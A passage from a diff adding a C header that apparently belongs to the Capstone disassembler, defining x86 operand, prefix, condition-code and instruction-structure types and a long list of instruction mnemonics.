X86_FPU_FLAGS_TEST_C2 (1ULL << 18) +#define X86_FPU_FLAGS_TEST_C3 (1ULL << 19) + + +/// Operand type for instruction's operands +typedef enum x86_op_type { + X86_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + X86_OP_REG, ///< = CS_OP_REG (Register operand). + X86_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + X86_OP_MEM, ///< = CS_OP_MEM (Memory operand). +} x86_op_type; + +/// XOP Code Condition type +typedef enum x86_xop_cc { + X86_XOP_CC_INVALID = 0, ///< Uninitialized. + X86_XOP_CC_LT, + X86_XOP_CC_LE, + X86_XOP_CC_GT, + X86_XOP_CC_GE, + X86_XOP_CC_EQ, + X86_XOP_CC_NEQ, + X86_XOP_CC_FALSE, + X86_XOP_CC_TRUE, +} x86_xop_cc; + +/// AVX broadcast type +typedef enum x86_avx_bcast { + X86_AVX_BCAST_INVALID = 0, ///< Uninitialized. 
+ X86_AVX_BCAST_2, ///< AVX512 broadcast type {1to2} + X86_AVX_BCAST_4, ///< AVX512 broadcast type {1to4} + X86_AVX_BCAST_8, ///< AVX512 broadcast type {1to8} + X86_AVX_BCAST_16, ///< AVX512 broadcast type {1to16} +} x86_avx_bcast; + +/// SSE Code Condition type +typedef enum x86_sse_cc { + X86_SSE_CC_INVALID = 0, ///< Uninitialized. + X86_SSE_CC_EQ, + X86_SSE_CC_LT, + X86_SSE_CC_LE, + X86_SSE_CC_UNORD, + X86_SSE_CC_NEQ, + X86_SSE_CC_NLT, + X86_SSE_CC_NLE, + X86_SSE_CC_ORD, +} x86_sse_cc; + +/// AVX Code Condition type +typedef enum x86_avx_cc { + X86_AVX_CC_INVALID = 0, ///< Uninitialized. + X86_AVX_CC_EQ, + X86_AVX_CC_LT, + X86_AVX_CC_LE, + X86_AVX_CC_UNORD, + X86_AVX_CC_NEQ, + X86_AVX_CC_NLT, + X86_AVX_CC_NLE, + X86_AVX_CC_ORD, + X86_AVX_CC_EQ_UQ, + X86_AVX_CC_NGE, + X86_AVX_CC_NGT, + X86_AVX_CC_FALSE, + X86_AVX_CC_NEQ_OQ, + X86_AVX_CC_GE, + X86_AVX_CC_GT, + X86_AVX_CC_TRUE, + X86_AVX_CC_EQ_OS, + X86_AVX_CC_LT_OQ, + X86_AVX_CC_LE_OQ, + X86_AVX_CC_UNORD_S, + X86_AVX_CC_NEQ_US, + X86_AVX_CC_NLT_UQ, + X86_AVX_CC_NLE_UQ, + X86_AVX_CC_ORD_S, + X86_AVX_CC_EQ_US, + X86_AVX_CC_NGE_UQ, + X86_AVX_CC_NGT_UQ, + X86_AVX_CC_FALSE_OS, + X86_AVX_CC_NEQ_OS, + X86_AVX_CC_GE_OQ, + X86_AVX_CC_GT_OQ, + X86_AVX_CC_TRUE_US, +} x86_avx_cc; + +/// AVX static rounding mode type +typedef enum x86_avx_rm { + X86_AVX_RM_INVALID = 0, ///< Uninitialized. 
+ X86_AVX_RM_RN, ///< Round to nearest + X86_AVX_RM_RD, ///< Round down + X86_AVX_RM_RU, ///< Round up + X86_AVX_RM_RZ, ///< Round toward zero +} x86_avx_rm; + +/// Instruction prefixes - to be used in cs_x86.prefix[] +typedef enum x86_prefix { + X86_PREFIX_LOCK = 0xf0, ///< lock (cs_x86.prefix[0] + X86_PREFIX_REP = 0xf3, ///< rep (cs_x86.prefix[0] + X86_PREFIX_REPE = 0xf3, ///< repe/repz (cs_x86.prefix[0] + X86_PREFIX_REPNE = 0xf2, ///< repne/repnz (cs_x86.prefix[0] + + X86_PREFIX_CS = 0x2e, ///< segment override CS (cs_x86.prefix[1] + X86_PREFIX_SS = 0x36, ///< segment override SS (cs_x86.prefix[1] + X86_PREFIX_DS = 0x3e, ///< segment override DS (cs_x86.prefix[1] + X86_PREFIX_ES = 0x26, ///< segment override ES (cs_x86.prefix[1] + X86_PREFIX_FS = 0x64, ///< segment override FS (cs_x86.prefix[1] + X86_PREFIX_GS = 0x65, ///< segment override GS (cs_x86.prefix[1] + + X86_PREFIX_OPSIZE = 0x66, ///< operand-size override (cs_x86.prefix[2] + X86_PREFIX_ADDRSIZE = 0x67, ///< address-size override (cs_x86.prefix[3] +} x86_prefix; + +/// Instruction's operand referring to memory +/// This is associated with X86_OP_MEM operand type above +typedef struct x86_op_mem { + x86_reg segment; ///< segment register (or X86_REG_INVALID if irrelevant) + x86_reg base; ///< base register (or X86_REG_INVALID if irrelevant) + x86_reg index; ///< index register (or X86_REG_INVALID if irrelevant) + int scale; ///< scale for index register + int64_t disp; ///< displacement value +} x86_op_mem; + +/// Instruction operand +typedef struct cs_x86_op { + x86_op_type type; ///< operand type + union { + x86_reg reg; ///< register value for REG operand + int64_t imm; ///< immediate value for IMM operand + x86_op_mem mem; ///< base/index/scale/disp value for MEM operand + }; + + /// size of this operand (in bytes). + uint8_t size; + + /// How is this operand accessed? (READ, WRITE or READ|WRITE) + /// This field is combined of cs_ac_type. 
+ /// NOTE: this field is irrelevant if engine is compiled in DIET mode. + uint8_t access; + + /// AVX broadcast type, or 0 if irrelevant + x86_avx_bcast avx_bcast; + + /// AVX zero opmask {z} + bool avx_zero_opmask; +} cs_x86_op; + +typedef struct cs_x86_encoding { + /// ModR/M offset, or 0 when irrelevant + uint8_t modrm_offset; + + /// Displacement offset, or 0 when irrelevant. + uint8_t disp_offset; + uint8_t disp_size; + + /// Immediate offset, or 0 when irrelevant. + uint8_t imm_offset; + uint8_t imm_size; +} cs_x86_encoding; + +/// Instruction structure +typedef struct cs_x86 { + /// Instruction prefix, which can be up to 4 bytes. + /// A prefix byte gets value 0 when irrelevant. + /// prefix[0] indicates REP/REPNE/LOCK prefix (See X86_PREFIX_REP/REPNE/LOCK above) + /// prefix[1] indicates segment override (irrelevant for x86_64): + /// See X86_PREFIX_CS/SS/DS/ES/FS/GS above. + /// prefix[2] indicates operand-size override (X86_PREFIX_OPSIZE) + /// prefix[3] indicates address-size override (X86_PREFIX_ADDRSIZE) + uint8_t prefix[4]; + + /// Instruction opcode, which can be from 1 to 4 bytes in size. + /// This contains VEX opcode as well. + /// An trailing opcode byte gets value 0 when irrelevant. + uint8_t opcode[4]; + + /// REX prefix: only a non-zero value is relevant for x86_64 + uint8_t rex; + + /// Address size, which can be overridden with above prefix[5]. + uint8_t addr_size; + + /// ModR/M byte + uint8_t modrm; + + /// SIB value, or 0 when irrelevant. + uint8_t sib; + + /// Displacement value, valid if encoding.disp_offset != 0 + int64_t disp; + + /// SIB index register, or X86_REG_INVALID when irrelevant. + x86_reg sib_index; + /// SIB scale, only applicable if sib_index is valid. + int8_t sib_scale; + /// SIB base register, or X86_REG_INVALID when irrelevant. 
+ x86_reg sib_base; + + /// XOP Code Condition + x86_xop_cc xop_cc; + + /// SSE Code Condition + x86_sse_cc sse_cc; + + /// AVX Code Condition + x86_avx_cc avx_cc; + + /// AVX Suppress all Exception + bool avx_sae; + + /// AVX static rounding mode + x86_avx_rm avx_rm; + + + union { + /// EFLAGS updated by this instruction. + /// This can be formed from OR combination of X86_EFLAGS_* symbols in x86.h + uint64_t eflags; + /// FPU_FLAGS updated by this instruction. + /// This can be formed from OR combination of X86_FPU_FLAGS_* symbols in x86.h + uint64_t fpu_flags; + }; + + /// Number of operands of this instruction, + /// or 0 when instruction has no operand. + uint8_t op_count; + + cs_x86_op operands[8]; ///< operands for this instruction. + + cs_x86_encoding encoding; ///< encoding information +} cs_x86; + +/// X86 instructions +typedef enum x86_insn { + X86_INS_INVALID = 0, + + X86_INS_AAA, + X86_INS_AAD, + X86_INS_AAM, + X86_INS_AAS, + X86_INS_FABS, + X86_INS_ADC, + X86_INS_ADCX, + X86_INS_ADD, + X86_INS_ADDPD, + X86_INS_ADDPS, + X86_INS_ADDSD, + X86_INS_ADDSS, + X86_INS_ADDSUBPD, + X86_INS_ADDSUBPS, + X86_INS_FADD, + X86_INS_FIADD, + X86_INS_FADDP, + X86_INS_ADOX, + X86_INS_AESDECLAST, + X86_INS_AESDEC, + X86_INS_AESENCLAST, + X86_INS_AESENC, + X86_INS_AESIMC, + X86_INS_AESKEYGENASSIST, + X86_INS_AND, + X86_INS_ANDN, + X86_INS_ANDNPD, + X86_INS_ANDNPS, + X86_INS_ANDPD, + X86_INS_ANDPS, + X86_INS_ARPL, + X86_INS_BEXTR, + X86_INS_BLCFILL, + X86_INS_BLCI, + X86_INS_BLCIC, + X86_INS_BLCMSK, + X86_INS_BLCS, + X86_INS_BLENDPD, + X86_INS_BLENDPS, + X86_INS_BLENDVPD, + X86_INS_BLENDVPS, + X86_INS_BLSFILL, + X86_INS_BLSI, + X86_INS_BLSIC, + X86_INS_BLSMSK, + X86_INS_BLSR, + X86_INS_BOUND, + X86_INS_BSF, + X86_INS_BSR, + X86_INS_BSWAP, + X86_INS_BT, + X86_INS_BTC, + X86_INS_BTR, + X86_INS_BTS, + X86_INS_BZHI, + X86_INS_CALL, + X86_INS_CBW, + X86_INS_CDQ, + X86_INS_CDQE, + X86_INS_FCHS, + X86_INS_CLAC, + X86_INS_CLC, + X86_INS_CLD, + X86_INS_CLFLUSH, + X86_INS_CLFLUSHOPT, 
+ X86_INS_CLGI, + X86_INS_CLI, + X86_INS_CLTS, + X86_INS_CLWB, + X86_INS_CMC, + X86_INS_CMOVA, + X86_INS_CMOVAE, + X86_INS_CMOVB, + X86_INS_CMOVBE, + X86_INS_FCMOVBE, + X86_INS_FCMOVB, + X86_INS_CMOVE, + X86_INS_FCMOVE, + X86_INS_CMOVG, + X86_INS_CMOVGE, + X86_INS_CMOVL, + X86_INS_CMOVLE, + X86_INS_FCMOVNBE, + X86_INS_FCMOVNB, + X86_INS_CMOVNE, + X86_INS_FCMOVNE, + X86_INS_CMOVNO, + X86_INS_CMOVNP, + X86_INS_FCMOVNU, + X86_INS_CMOVNS, + X86_INS_CMOVO, + X86_INS_CMOVP, + X86_INS_FCMOVU, + X86_INS_CMOVS, + X86_INS_CMP, + X86_INS_CMPSB, + X86_INS_CMPSQ, + X86_INS_CMPSW, + X86_INS_CMPXCHG16B, + X86_INS_CMPXCHG, + X86_INS_CMPXCHG8B, + X86_INS_COMISD, + X86_INS_COMISS, + X86_INS_FCOMP, + X86_INS_FCOMIP, + X86_INS_FCOMI, + X86_INS_FCOM, + X86_INS_FCOS, + X86_INS_CPUID, + X86_INS_CQO, + X86_INS_CRC32, + X86_INS_CVTDQ2PD, + X86_INS_CVTDQ2PS, + X86_INS_CVTPD2DQ, + X86_INS_CVTPD2PS, + X86_INS_CVTPS2DQ, + X86_INS_CVTPS2PD, + X86_INS_CVTSD2SI, + X86_INS_CVTSD2SS, + X86_INS_CVTSI2SD, + X86_INS_CVTSI2SS, + X86_INS_CVTSS2SD, + X86_INS_CVTSS2SI, + X86_INS_CVTTPD2DQ, + X86_INS_CVTTPS2DQ, + X86_INS_CVTTSD2SI, + X86_INS_CVTTSS2SI, + X86_INS_CWD, + X86_INS_CWDE, + X86_INS_DAA, + X86_INS_DAS, + X86_INS_DATA16, + X86_INS_DEC, + X86_INS_DIV, + X86_INS_DIVPD, + X86_INS_DIVPS, + X86_INS_FDIVR, + X86_INS_FIDIVR, + X86_INS_FDIVRP, + X86_INS_DIVSD, + X86_INS_DIVSS, + X86_INS_FDIV, + X86_INS_FIDIV, + X86_INS_FDIVP, + X86_INS_DPPD, + X86_INS_DPPS, + X86_INS_RET, + X86_INS_ENCLS, + X86_INS_ENCLU, + X86_INS_ENTER, + X86_INS_EXTRACTPS, + X86_INS_EXTRQ, + X86_INS_F2XM1, + X86_INS_LCALL, + X86_INS_LJMP, + X86_INS_FBLD, + X86_INS_FBSTP, + X86_INS_FCOMPP, + X86_INS_FDECSTP, + X86_INS_FEMMS, + X86_INS_FFREE, + X86_INS_FICOM, + X86_INS_FICOMP, + X86_INS_FINCSTP, + X86_INS_FLDCW, + X86_INS_FLDENV, + X86_INS_FLDL2E, + X86_INS_FLDL2T, + X86_INS_FLDLG2, + X86_INS_FLDLN2, + X86_INS_FLDPI, + X86_INS_FNCLEX, + X86_INS_FNINIT, + X86_INS_FNOP, + X86_INS_FNSTCW, + X86_INS_FNSTSW, + X86_INS_FPATAN, + X86_INS_FPREM, 
+ X86_INS_FPREM1, + X86_INS_FPTAN, + X86_INS_FFREEP, + X86_INS_FRNDINT, + X86_INS_FRSTOR, + X86_INS_FNSAVE, + X86_INS_FSCALE, + X86_INS_FSETPM, + X86_INS_FSINCOS, + X86_INS_FNSTENV, + X86_INS_FXAM, + X86_INS_FXRSTOR, + X86_INS_FXRSTOR64, + X86_INS_FXSAVE, + X86_INS_FXSAVE64, + X86_INS_FXTRACT, + X86_INS_FYL2X, + X86_INS_FYL2XP1, + X86_INS_MOVAPD, + X86_INS_MOVAPS, + X86_INS_ORPD, + X86_INS_ORPS, + X86_INS_VMOVAPD, + X86_INS_VMOVAPS, + X86_INS_XORPD, + X86_INS_XORPS, + X86_INS_GETSEC, + X86_INS_HADDPD, + X86_INS_HADDPS, + X86_INS_HLT, + X86_INS_HSUBPD, + X86_INS_HSUBPS, + X86_INS_IDIV, + X86_INS_FILD, + X86_INS_IMUL, + X86_INS_IN, + X86_INS_INC, + X86_INS_INSB, + X86_INS_INSERTPS, + X86_INS_INSERTQ, + X86_INS_INSD, + X86_INS_INSW, + X86_INS_INT, + X86_INS_INT1, + X86_INS_INT3, + X86_INS_INTO, + X86_INS_INVD, + X86_INS_INVEPT, + X86_INS_INVLPG, + X86_INS_INVLPGA, + X86_INS_INVPCID, + X86_INS_INVVPID, + X86_INS_IRET, + X86_INS_IRETD, + X86_INS_IRETQ, + X86_INS_FISTTP, + X86_INS_FIST, + X86_INS_FISTP, + X86_INS_UCOMISD, + X86_INS_UCOMISS, + X86_INS_VCOMISD, + X86_INS_VCOMISS, + X86_INS_VCVTSD2SS, + X86_INS_VCVTSI2SD, + X86_INS_VCVTSI2SS, + X86_INS_VCVTSS2SD, + X86_INS_VCVTTSD2SI, + X86_INS_VCVTTSD2USI, + X86_INS_VCVTTSS2SI, + X86_INS_VCVTTSS2USI, + X86_INS_VCVTUSI2SD, + X86_INS_VCVTUSI2SS, + X86_INS_VUCOMISD, + X86_INS_VUCOMISS, + X86_INS_JAE, + X86_INS_JA, + X86_INS_JBE, + X86_INS_JB, + X86_INS_JCXZ, + X86_INS_JECXZ, + X86_INS_JE, + X86_INS_JGE, + X86_INS_JG, + X86_INS_JLE, + X86_INS_JL, + X86_INS_JMP, + X86_INS_JNE, + X86_INS_JNO, + X86_INS_JNP, + X86_INS_JNS, + X86_INS_JO, + X86_INS_JP, + X86_INS_JRCXZ, + X86_INS_JS, + X86_INS_KANDB, + X86_INS_KANDD, + X86_INS_KANDNB, + X86_INS_KANDND, + X86_INS_KANDNQ, + X86_INS_KANDNW, + X86_INS_KANDQ, + X86_INS_KANDW, + X86_INS_KMOVB, + X86_INS_KMOVD, + X86_INS_KMOVQ, + X86_INS_KMOVW, + X86_INS_KNOTB, + X86_INS_KNOTD, + X86_INS_KNOTQ, + X86_INS_KNOTW, + X86_INS_KORB, + X86_INS_KORD, + X86_INS_KORQ, + X86_INS_KORTESTB, + 
X86_INS_KORTESTD, + X86_INS_KORTESTQ, + X86_INS_KORTESTW, + X86_INS_KORW, + X86_INS_KSHIFTLB, + X86_INS_KSHIFTLD, + X86_INS_KSHIFTLQ, + X86_INS_KSHIFTLW, + X86_INS_KSHIFTRB, + X86_INS_KSHIFTRD, + X86_INS_KSHIFTRQ, + X86_INS_KSHIFTRW, + X86_INS_KUNPCKBW, + X86_INS_KXNORB, + X86_INS_KXNORD, + X86_INS_KXNORQ, + X86_INS_KXNORW, + X86_INS_KXORB, + X86_INS_KXORD, + X86_INS_KXORQ, + X86_INS_KXORW, + X86_INS_LAHF, + X86_INS_LAR, + X86_INS_LDDQU, + X86_INS_LDMXCSR, + X86_INS_LDS, + X86_INS_FLDZ, + X86_INS_FLD1, + X86_INS_FLD, + X86_INS_LEA, + X86_INS_LEAVE, + X86_INS_LES, + X86_INS_LFENCE, + X86_INS_LFS, + X86_INS_LGDT, + X86_INS_LGS, + X86_INS_LIDT, + X86_INS_LLDT, + X86_INS_LMSW, + X86_INS_OR, + X86_INS_SUB, + X86_INS_XOR, + X86_INS_LODSB, + X86_INS_LODSD, + X86_INS_LODSQ, + X86_INS_LODSW, + X86_INS_LOOP, + X86_INS_LOOPE, + X86_INS_LOOPNE, + X86_INS_RETF, + X86_INS_RETFQ, + X86_INS_LSL, + X86_INS_LSS, + X86_INS_LTR, + X86_INS_XADD, + X86_INS_LZCNT, + X86_INS_MASKMOVDQU, + X86_INS_MAXPD, + X86_INS_MAXPS, + X86_INS_MAXSD, + X86_INS_MAXSS, + X86_INS_MFENCE, + X86_INS_MINPD, + X86_INS_MINPS, + X86_INS_MINSD, + X86_INS_MINSS, + X86_INS_CVTPD2PI, + X86_INS_CVTPI2PD, + X86_INS_CVTPI2PS, + X86_INS_CVTPS2PI, + X86_INS_CVTTPD2PI, + X86_INS_CVTTPS2PI, + X86_INS_EMMS, + X86_INS_MASKMOVQ, + X86_INS_MOVD, + X86_INS_MOVDQ2Q, + X86_INS_MOVNTQ, + X86_INS_MOVQ2DQ, + X86_INS_MOVQ, + X86_INS_PABSB, + X86_INS_PABSD, + X86_INS_PABSW, + X86_INS_PACKSSDW, + X86_INS_PACKSSWB, + X86_INS_PACKUSWB, + X86_INS_PADDB, + X86_INS_PADDD, + X86_INS_PADDQ, + X86_INS_PADDSB, + X86_INS_PADDSW, + X86_INS_PADDUSB, + X86_INS_PADDUSW, + X86_INS_PADDW, + X86_INS_PALIGNR, + X86_INS_PANDN, + X86_INS_PAND, + X86_INS_PAVGB, + X86_INS_PAVGW, + X86_INS_PCMPEQB, + X86_INS_PCMPEQD, + X86_INS_PCMPEQW, + X86_INS_PCMPGTB, + X86_INS_PCMPGTD, + X86_INS_PCMPGTW, + X86_INS_PEXTRW, + X86_INS_PHADDSW, + X86_INS_PHADDW, + X86_INS_PHADDD, + X86_INS_PHSUBD, + X86_INS_PHSUBSW, + X86_INS_PHSUBW, + X86_INS_PINSRW, + X86_INS_PMADDUBSW, + 
X86_INS_PMADDWD, + X86_INS_PMAXSW, + X86_INS_PMAXUB, + X86_INS_PMINSW, + X86_INS_PMINUB, + X86_INS_PMOVMSKB, + X86_INS_PMULHRSW, + X86_INS_PMULHUW, + X86_INS_PMULHW, + X86_INS_PMULLW, + X86_INS_PMULUDQ, + X86_INS_POR, + X86_INS_PSADBW, + X86_INS_PSHUFB, + X86_INS_PSHUFW, + X86_INS_PSIGNB, + X86_INS_PSIGND, + X86_INS_PSIGNW, + X86_INS_PSLLD, + X86_INS_PSLLQ, + X86_INS_PSLLW, + X86_INS_PSRAD, + X86_INS_PSRAW, + X86_INS_PSRLD, + X86_INS_PSRLQ, + X86_INS_PSRLW, + X86_INS_PSUBB, + X86_INS_PSUBD, + X86_INS_PSUBQ, + X86_INS_PSUBSB, + X86_INS_PSUBSW, + X86_INS_PSUBUSB, + X86_INS_PSUBUSW, + X86_INS_PSUBW, + X86_INS_PUNPCKHBW, + X86_INS_PUNPCKHDQ, + X86_INS_PUNPCKHWD, + X86_INS_PUNPCKLBW, + X86_INS_PUNPCKLDQ, + X86_INS_PUNPCKLWD, + X86_INS_PXOR, + X86_INS_MONITOR, + X86_INS_MONTMUL, + X86_INS_MOV, + X86_INS_MOVABS, + X86_INS_MOVBE, + X86_INS_MOVDDUP, + X86_INS_MOVDQA, + X86_INS_MOVDQU, + X86_INS_MOVHLPS, + X86_INS_MOVHPD, + X86_INS_MOVHPS, + X86_INS_MOVLHPS, + X86_INS_MOVLPD, + X86_INS_MOVLPS, + X86_INS_MOVMSKPD, + X86_INS_MOVMSKPS, + X86_INS_MOVNTDQA, + X86_INS_MOVNTDQ, + X86_INS_MOVNTI, + X86_INS_MOVNTPD, + X86_INS_MOVNTPS, + X86_INS_MOVNTSD, + X86_INS_MOVNTSS, + X86_INS_MOVSB, + X86_INS_MOVSD, + X86_INS_MOVSHDUP, + X86_INS_MOVSLDUP, + X86_INS_MOVSQ, + X86_INS_MOVSS, + X86_INS_MOVSW, + X86_INS_MOVSX, + X86_INS_MOVSXD, + X86_INS_MOVUPD, + X86_INS_MOVUPS, + X86_INS_MOVZX, + X86_INS_MPSADBW, + X86_INS_MUL, + X86_INS_MULPD, + X86_INS_MULPS, + X86_INS_MULSD, + X86_INS_MULSS, + X86_INS_MULX, + X86_INS_FMUL, + X86_INS_FIMUL, + X86_INS_FMULP, + X86_INS_MWAIT, + X86_INS_NEG, + X86_INS_NOP, + X86_INS_NOT, + X86_INS_OUT, + X86_INS_OUTSB, + X86_INS_OUTSD, + X86_INS_OUTSW, + X86_INS_PACKUSDW, + X86_INS_PAUSE, + X86_INS_PAVGUSB, + X86_INS_PBLENDVB, + X86_INS_PBLENDW, + X86_INS_PCLMULQDQ, + X86_INS_PCMPEQQ, + X86_INS_PCMPESTRI, + X86_INS_PCMPESTRM, + X86_INS_PCMPGTQ, + X86_INS_PCMPISTRI, + X86_INS_PCMPISTRM, + X86_INS_PCOMMIT, + X86_INS_PDEP, + X86_INS_PEXT, + X86_INS_PEXTRB, + 
X86_INS_PEXTRD, + X86_INS_PEXTRQ, + X86_INS_PF2ID, + X86_INS_PF2IW, + X86_INS_PFACC, + X86_INS_PFADD, + X86_INS_PFCMPEQ, + X86_INS_PFCMPGE, + X86_INS_PFCMPGT, + X86_INS_PFMAX, + X86_INS_PFMIN, + X86_INS_PFMUL, + X86_INS_PFNACC, + X86_INS_PFPNACC, + X86_INS_PFRCPIT1, + X86_INS_PFRCPIT2, + X86_INS_PFRCP, + X86_INS_PFRSQIT1, + X86_INS_PFRSQRT, + X86_INS_PFSUBR, + X86_INS_PFSUB, + X86_INS_PHMINPOSUW, + X86_INS_PI2FD, + X86_INS_PI2FW, + X86_INS_PINSRB, + X86_INS_PINSRD, + X86_INS_PINSRQ, + X86_INS_PMAXSB, + X86_INS_PMAXSD, + X86_INS_PMAXUD, + X86_INS_PMAXUW, + X86_INS_PMINSB, + X86_INS_PMINSD, + X86_INS_PMINUD, + X86_INS_PMINUW, + X86_INS_PMOVSXBD, + X86_INS_PMOVSXBQ, + X86_INS_PMOVSXBW, + X86_INS_PMOVSXDQ, + X86_INS_PMOVSXWD, + X86_INS_PMOVSXWQ, + X86_INS_PMOVZXBD, + X86_INS_PMOVZXBQ, + X86_INS_PMOVZXBW, + X86_INS_PMOVZXDQ, + X86_INS_PMOVZXWD, + X86_INS_PMOVZXWQ, + X86_INS_PMULDQ, + X86_INS_PMULHRW, + X86_INS_PMULLD, + X86_INS_POP, + X86_INS_POPAW, + X86_INS_POPAL, + X86_INS_POPCNT, + X86_INS_POPF, + X86_INS_POPFD, + X86_INS_POPFQ, + X86_INS_PREFETCH, + X86_INS_PREFETCHNTA, + X86_INS_PREFETCHT0, + X86_INS_PREFETCHT1, + X86_INS_PREFETCHT2, + X86_INS_PREFETCHW, + X86_INS_PSHUFD, + X86_INS_PSHUFHW, + X86_INS_PSHUFLW, + X86_INS_PSLLDQ, + X86_INS_PSRLDQ, + X86_INS_PSWAPD, + X86_INS_PTEST, + X86_INS_PUNPCKHQDQ, + X86_INS_PUNPCKLQDQ, + X86_INS_PUSH, + X86_INS_PUSHAW, + X86_INS_PUSHAL, + X86_INS_PUSHF, + X86_INS_PUSHFD, + X86_INS_PUSHFQ, + X86_INS_RCL, + X86_INS_RCPPS, + X86_INS_RCPSS, + X86_INS_RCR, + X86_INS_RDFSBASE, + X86_INS_RDGSBASE, + X86_INS_RDMSR, + X86_INS_RDPMC, + X86_INS_RDRAND, + X86_INS_RDSEED, + X86_INS_RDTSC, + X86_INS_RDTSCP, + X86_INS_ROL, + X86_INS_ROR, + X86_INS_RORX, + X86_INS_ROUNDPD, + X86_INS_ROUNDPS, + X86_INS_ROUNDSD, + X86_INS_ROUNDSS, + X86_INS_RSM, + X86_INS_RSQRTPS, + X86_INS_RSQRTSS, + X86_INS_SAHF, + X86_INS_SAL, + X86_INS_SALC, + X86_INS_SAR, + X86_INS_SARX, + X86_INS_SBB, + X86_INS_SCASB, + X86_INS_SCASD, + X86_INS_SCASQ, + X86_INS_SCASW, + 
X86_INS_SETAE, + X86_INS_SETA, + X86_INS_SETBE, + X86_INS_SETB, + X86_INS_SETE, + X86_INS_SETGE, + X86_INS_SETG, + X86_INS_SETLE, + X86_INS_SETL, + X86_INS_SETNE, + X86_INS_SETNO, + X86_INS_SETNP, + X86_INS_SETNS, + X86_INS_SETO, + X86_INS_SETP, + X86_INS_SETS, + X86_INS_SFENCE, + X86_INS_SGDT, + X86_INS_SHA1MSG1, + X86_INS_SHA1MSG2, + X86_INS_SHA1NEXTE, + X86_INS_SHA1RNDS4, + X86_INS_SHA256MSG1, + X86_INS_SHA256MSG2, + X86_INS_SHA256RNDS2, + X86_INS_SHL, + X86_INS_SHLD, + X86_INS_SHLX, + X86_INS_SHR, + X86_INS_SHRD, + X86_INS_SHRX, + X86_INS_SHUFPD, + X86_INS_SHUFPS, + X86_INS_SIDT, + X86_INS_FSIN, + X86_INS_SKINIT, + X86_INS_SLDT, + X86_INS_SMSW, + X86_INS_SQRTPD, + X86_INS_SQRTPS, + X86_INS_SQRTSD, + X86_INS_SQRTSS, + X86_INS_FSQRT, + X86_INS_STAC, + X86_INS_STC, + X86_INS_STD, + X86_INS_STGI, + X86_INS_STI, + X86_INS_STMXCSR, + X86_INS_STOSB, + X86_INS_STOSD, + X86_INS_STOSQ, + X86_INS_STOSW, + X86_INS_STR, + X86_INS_FST, + X86_INS_FSTP, + X86_INS_FSTPNCE, + X86_INS_FXCH, + X86_INS_SUBPD, + X86_INS_SUBPS, + X86_INS_FSUBR, + X86_INS_FISUBR, + X86_INS_FSUBRP, + X86_INS_SUBSD, + X86_INS_SUBSS, + X86_INS_FSUB, + X86_INS_FISUB, + X86_INS_FSUBP, + X86_INS_SWAPGS, + X86_INS_SYSCALL, + X86_INS_SYSENTER, + X86_INS_SYSEXIT, + X86_INS_SYSRET, + X86_INS_T1MSKC, + X86_INS_TEST, + X86_INS_UD2, + X86_INS_FTST, + X86_INS_TZCNT, + X86_INS_TZMSK, + X86_INS_FUCOMIP, + X86_INS_FUCOMI, + X86_INS_FUCOMPP, + X86_INS_FUCOMP, + X86_INS_FUCOM, + X86_INS_UD2B, + X86_INS_UNPCKHPD, + X86_INS_UNPCKHPS, + X86_INS_UNPCKLPD, + X86_INS_UNPCKLPS, + X86_INS_VADDPD, + X86_INS_VADDPS, + X86_INS_VADDSD, + X86_INS_VADDSS, + X86_INS_VADDSUBPD, + X86_INS_VADDSUBPS, + X86_INS_VAESDECLAST, + X86_INS_VAESDEC, + X86_INS_VAESENCLAST, + X86_INS_VAESENC, + X86_INS_VAESIMC, + X86_INS_VAESKEYGENASSIST, + X86_INS_VALIGND, + X86_INS_VALIGNQ, + X86_INS_VANDNPD, + X86_INS_VANDNPS, + X86_INS_VANDPD, + X86_INS_VANDPS, + X86_INS_VBLENDMPD, + X86_INS_VBLENDMPS, + X86_INS_VBLENDPD, + X86_INS_VBLENDPS, + 
X86_INS_VBLENDVPD, + X86_INS_VBLENDVPS, + X86_INS_VBROADCASTF128, + X86_INS_VBROADCASTI32X4, + X86_INS_VBROADCASTI64X4, + X86_INS_VBROADCASTSD, + X86_INS_VBROADCASTSS, + X86_INS_VCOMPRESSPD, + X86_INS_VCOMPRESSPS, + X86_INS_VCVTDQ2PD, + X86_INS_VCVTDQ2PS, + X86_INS_VCVTPD2DQX, + X86_INS_VCVTPD2DQ, + X86_INS_VCVTPD2PSX, + X86_INS_VCVTPD2PS, + X86_INS_VCVTPD2UDQ, + X86_INS_VCVTPH2PS, + X86_INS_VCVTPS2DQ, + X86_INS_VCVTPS2PD, + X86_INS_VCVTPS2PH, + X86_INS_VCVTPS2UDQ, + X86_INS_VCVTSD2SI, + X86_INS_VCVTSD2USI, + X86_INS_VCVTSS2SI, + X86_INS_VCVTSS2USI, + X86_INS_VCVTTPD2DQX, + X86_INS_VCVTTPD2DQ, + X86_INS_VCVTTPD2UDQ, + X86_INS_VCVTTPS2DQ, + X86_INS_VCVTTPS2UDQ, + X86_INS_VCVTUDQ2PD, + X86_INS_VCVTUDQ2PS, + X86_INS_VDIVPD, + X86_INS_VDIVPS, + X86_INS_VDIVSD, + X86_INS_VDIVSS, + X86_INS_VDPPD, + X86_INS_VDPPS, + X86_INS_VERR, + X86_INS_VERW, + X86_INS_VEXP2PD, + X86_INS_VEXP2PS, + X86_INS_VEXPANDPD, + X86_INS_VEXPANDPS, + X86_INS_VEXTRACTF128, + X86_INS_VEXTRACTF32X4, + X86_INS_VEXTRACTF64X4, + X86_INS_VEXTRACTI128, + X86_INS_VEXTRACTI32X4, + X86_INS_VEXTRACTI64X4, + X86_INS_VEXTRACTPS, + X86_INS_VFMADD132PD, + X86_INS_VFMADD132PS, + X86_INS_VFMADDPD, + X86_INS_VFMADD213PD, + X86_INS_VFMADD231PD, + X86_INS_VFMADDPS, + X86_INS_VFMADD213PS, + X86_INS_VFMADD231PS, + X86_INS_VFMADDSD, + X86_INS_VFMADD213SD, + X86_INS_VFMADD132SD, + X86_INS_VFMADD231SD, + X86_INS_VFMADDSS, + X86_INS_VFMADD213SS, + X86_INS_VFMADD132SS, + X86_INS_VFMADD231SS, + X86_INS_VFMADDSUB132PD, + X86_INS_VFMADDSUB132PS, + X86_INS_VFMADDSUBPD, + X86_INS_VFMADDSUB213PD, + X86_INS_VFMADDSUB231PD, + X86_INS_VFMADDSUBPS, + X86_INS_VFMADDSUB213PS, + X86_INS_VFMADDSUB231PS, + X86_INS_VFMSUB132PD, + X86_INS_VFMSUB132PS, + X86_INS_VFMSUBADD132PD, + X86_INS_VFMSUBADD132PS, + 